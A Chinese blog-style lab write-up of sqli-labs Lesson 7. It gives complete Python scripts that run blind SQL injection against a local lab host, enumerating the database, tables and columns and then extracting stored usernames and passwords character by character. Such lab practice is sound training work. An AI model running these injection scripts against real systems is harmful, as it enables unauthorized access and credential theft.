sqli-labs-lesson7

这个是盲注，也是报错注入，有点绕
先看看流程吧

图片.png

都是成双的，
第一句：判断有没注入
第二句：判断当前表有几个字段
第三句：判断数据库名长度
第四局：猜数据库名
第五句：判断语句有没正常执行
第六句：也是判断数据库名长度
第七句：判断有几个表
第八句：判断每个表长度
第九句：猜表名
第十句：判断有几个字段
第十一句：判断每个字段的长度
第十二句：猜字段名
第十三句：有几条数据
第十四句：每个数据长度
第十五句：猜数据

脚本

当然不可能使用手动咯，

# 数据库长度
database_length = 0
for _ in range(0,10):
    url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length(database())>{} -- ".format(_)
    response = requests.get(url)
    if "You have an error in your SQL syntax" in response.text:
        print("[+] Databse length is <{}>".format(_))
        database_length = _
        break
    else:
        print("[-] {}".format(_))

图片.png

# 猜数据名
import string
database_name = ""
for _ in range(1, database_length+1):
    for char in string.ascii_lowercase:
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and substr(database(),{},1)>'{}' -- ".format(_, char)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] find name is [{}]<{}>".format(_,char))
            database_name += char
            break
        else:
            print("[-] {}".format(char))

print(database_name)

图片.png

# 猜有几个表
tables_count = 0
for _ in range(1,100):
    url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select table_name from information_schema.tables where table_schema='security' limit {},1))>0 -- ".format(_)
    response = requests.get(url)
    if "You have an error in your SQL syntax" in response.text:
        print("[+] table count is <{}>".format(_))
        tables_count = _
        break
    else:
        print("[-] {}".format(_))

图片.png

# 每个表名有多长
tables_length = []
for _ in range(0,tables_count):
    for i in range(0, 100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select table_name from information_schema.tables where table_schema='{}' limit {},1))>{} -- ".format(database_name,_, i)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] [{}]table length is <{}>".format(_,i))
            tables_length.append(i)
            break
        else:
            print("[-] [{}]{}".format(_,i))

图片.png

# 猜表名
tables_name = []
for _ in range(0, tables_count):
    table_name = ""
    for i in range(1, tables_length[_]+1):
        for char in string.ascii_lowercase:
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and substr((select table_name from information_schema.tables where table_schema='{}' limit {},1), {},1)>'{}' -- ".format(database_name,_,i, char)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}][{}]table name is <{}>".format(_,i, char))
                table_name += char
                break
            else:
                print("[-] [{}][{}]{}".format(_,i, char))
    tables_name.append(table_name)

图片.png

# 猜users表有几个字段
columns_count = 0
for _ in range(1,100):
    url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select column_name from information_schema.columns where table_name='{}' limit {},1))>0 -- ".format(tables_name[3], _)
    response = requests.get(url)
    if "You have an error in your SQL syntax" in response.text:
        print("[+] column count is <{}>".format(_))
        columns_count = _
        break
    else:
        print("[-] {}".format(_))

图片.png

# 每个字段名有多长
columns_length = []
for _ in range(0,columns_count):
    for i in range(0, 100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select column_name from information_schema.columns where table_name='{}' limit {},1))>{} -- ".format(tables_name[3],_, i)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] [{}]column length is <{}>".format(_,i))
            columns_length.append(i)
            break
        else:
            print("[-] [{}]{}".format(_,i))

图片.png

# 猜列名
columns_name = []
for _ in range(0, columns_count):
    column_name = ""
    for i in range(1, columns_length[_]+1):
        for char in string.ascii_lowercase:
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and substr((select column_name from information_schema.columns where table_name='{}' limit {},1), {},1)>'{}' -- ".format(tables_name[3],_,i, char)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}][{}]column name is <{}>".format(_,i, char))
                column_name += char
                break
            else:
                print("[-] [{}][{}]{}".format(_,i, char))
    print(column_name)
    columns_name.append(column_name)

图片.png

# 猜有多少记录
row = 0
for _ in range(1,100):
    url = "http://192.168.154.131/sqli/Less-7/?id=1')) and (select count(id) from users)>{} -- ".format(_)
    response = requests.get(url)
    if "You have an error in your SQL syntax" in response.text:
        print("[+] row name is <{}>".format(_))
        row = _
        break
    else:
        print("[-] {}".format(_))

图片.png

# 猜每个数据的长度
username_password_length = []
for _ in range(0, row):
    up = []
    # 用户名的长度
    for ui in range(1,100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select username from users limit {},1))>={} -- ".format(_,ui)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] [{}] username length is <{}>".format(_,ui-1))
            up.append(ui-1)
            break
        else:
            print("[-] [{}] {}".format(_,ui-1))
    # 密码的长度
    for pi in range(1,100):
        url = "http://192.168.154.131/sqli/Less-7/?id=1')) and char_length((select password from users limit {},1))>={} -- ".format(_,pi)
        response = requests.get(url)
        if "You have an error in your SQL syntax" in response.text:
            print("[+] [{}] password length is <{}>".format(_,pi-1))
            up.append(pi-1)
            break
        else:
            print("[-] [{}] {}".format(_,pi-1))
    username_password_length.append(up)
username_password_length

图片.png

# 猜数据
data = []
for _ in range(row):
    username = ""
    for ui in range(username_password_length[_][0]):
        for inti in range(33,128):
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and 1=(select ascii(substr((select username from users limit {},1),{},1))>={}) -- ".format(_,ui+1,inti)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}] username[{}]  is <{}>".format(_+1,ui+1, chr(inti-1)))
                username += chr(inti-1)
                break
            else:
                print("[-] [{}][{}] {}".format(_+1,ui+1, chr(inti)))
    print(username)
    password = ""
    for pi in range(username_password_length[_][1]):
        for inti in range(33,128):
            url = "http://192.168.154.131/sqli/Less-7/?id=1')) and 1=(select ascii(substr((select password from users limit {},1),{},1))>={}) -- ".format(_,pi+1,inti)
            response = requests.get(url)
            if "You have an error in your SQL syntax" in response.text:
                print("[+] [{}] password[{}]  is <{}>".format(_+1,pi+1, chr(inti-1)))
                password += chr(inti-1)
                break
            else:
                print("[-] [{}][{}] {}".format(_+1,pi+1, chr(inti)))
    print(password)
    data.append([username, password])

图片.png

算是完了，

可以优化，使用二分法，速度更快

人面猴
序言：七十年代末，一起剥皮案震惊了整个滨河市，随后出现的几起案子，更是在滨河造成了极大的恐慌，老刑警刘岩，带你破解...
沈念sama阅读 194,491评论 5赞 459
死咒
序言：滨河连续发生了三起死亡事件，死亡现场离奇诡异，居然都是意外死亡，警方通过查阅死者的电脑和手机，发现死者居然都...
沈念sama阅读 81,856评论 2赞 371
救了他两次的神仙让他今天三更去死
文/潘晓璐我一进店门，熙熙楼的掌柜王于贵愁眉苦脸地迎上来，“玉大人，你说我怎么就摊上这事。” “怎么了？”我有些...
开封第一讲书人阅读 141,745评论 0赞 319
道士缉凶录：失踪的卖姜人
文/不坏的土叔我叫张陵，是天一观的道长。经常有香客问我，道长，这世上最难降的妖魔是什么？我笑而不...
开封第一讲书人阅读 52,196评论 1赞 263
港岛之恋（遗憾婚礼）
正文为了忘掉前任，我火速办了婚礼，结果婚礼上，老公的妹妹穿的比我还像新娘。我一直安慰自己，他们只是感情好，可当我...
茶点故事阅读 61,073评论 4赞 355
恶毒庶女顶嫁案：这布局不是一般人想出来的
文/花漫我一把揭开白布。她就那样静静地躺着，像睡着了一般。火红的嫁衣衬着肌肤如雪。梳的纹丝不乱的头发上，一...
开封第一讲书人阅读 46,112评论 1赞 272
城市分裂传说
那天，我揣着相机与录音，去河边找鬼。笑死，一个胖子当着我的面吹牛，可吹牛的内容都是我干的。我是一名探鬼主播，决...
沈念sama阅读 36,531评论 3赞 381
双鸳鸯连环套：你想象不到人心有多黑
文/苍兰香墨我猛地睁开眼，长吁一口气：“原来是场噩梦啊……” “哼！你这毒妇竟也来了？” 一声冷哼从身侧响起，我...
开封第一讲书人阅读 35,215评论 0赞 253
万荣杀人案实录
序言：老挝万荣一对情侣失踪，失踪者是张志新（化名）和其女友刘颖，没想到半个月后，有当地人在树林里发现了一具尸体，经...
沈念sama阅读 39,485评论 1赞 290
护林员之死
正文独居荒郊野岭守林人离奇死亡，尸身上长有42处带血的脓包…… 初始之章·张勋以下内容为张勋视角年9月15日...
茶点故事阅读 34,578评论 2赞 309
白月光启示录
正文我和宋清朗相恋三年，在试婚纱的时候发现自己被绿了。大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
茶点故事阅读 36,356评论 1赞 326
活死人
序言：一个原本活蹦乱跳的男人离奇死亡，死状恐怖，灵堂内的尸体忽然破棺而出，到底是诈尸还是另有隐情，我是刑警宁泽，带...
沈念sama阅读 32,215评论 3赞 312
日本核电站爆炸内幕
正文年R本政府宣布，位于F岛的核电站，受9级特大地震影响，放射性物质发生泄漏。R本人自食恶果不足惜，却给世界环境...
茶点故事阅读 37,583评论 3赞 299
男人毒药：我在死后第九天来索命
文/蒙蒙一、第九天我趴在偏房一处隐蔽的房顶上张望。院中可真热闹，春花似锦、人声如沸。这庄子的主人今日做“春日...
开封第一讲书人阅读 28,898评论 0赞 17
一桩弑父案，背后竟有这般阴谋
文/苍兰香墨我抬头看了看天上的太阳。三九已至，却和暖如春，着一层夹袄步出监牢的瞬间，已是汗流浃背。一阵脚步声响...
开封第一讲书人阅读 30,174评论 1赞 250
情欲美人皮
我被黑心中介骗来泰国打工，没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留，地道东北人。一个月前我还...
沈念sama阅读 41,497评论 2赞 341
代替公主和亲
正文我出身青楼，却偏偏与公主长得像，于是被迫代替她去往敌国和亲。传闻我的和亲对象是个残疾皇子，可洞房花烛夜当晚...
茶点故事阅读 40,697评论 2赞 335

sqli-labs-lesson7

脚本

算是完了，

推荐阅读更多精彩内容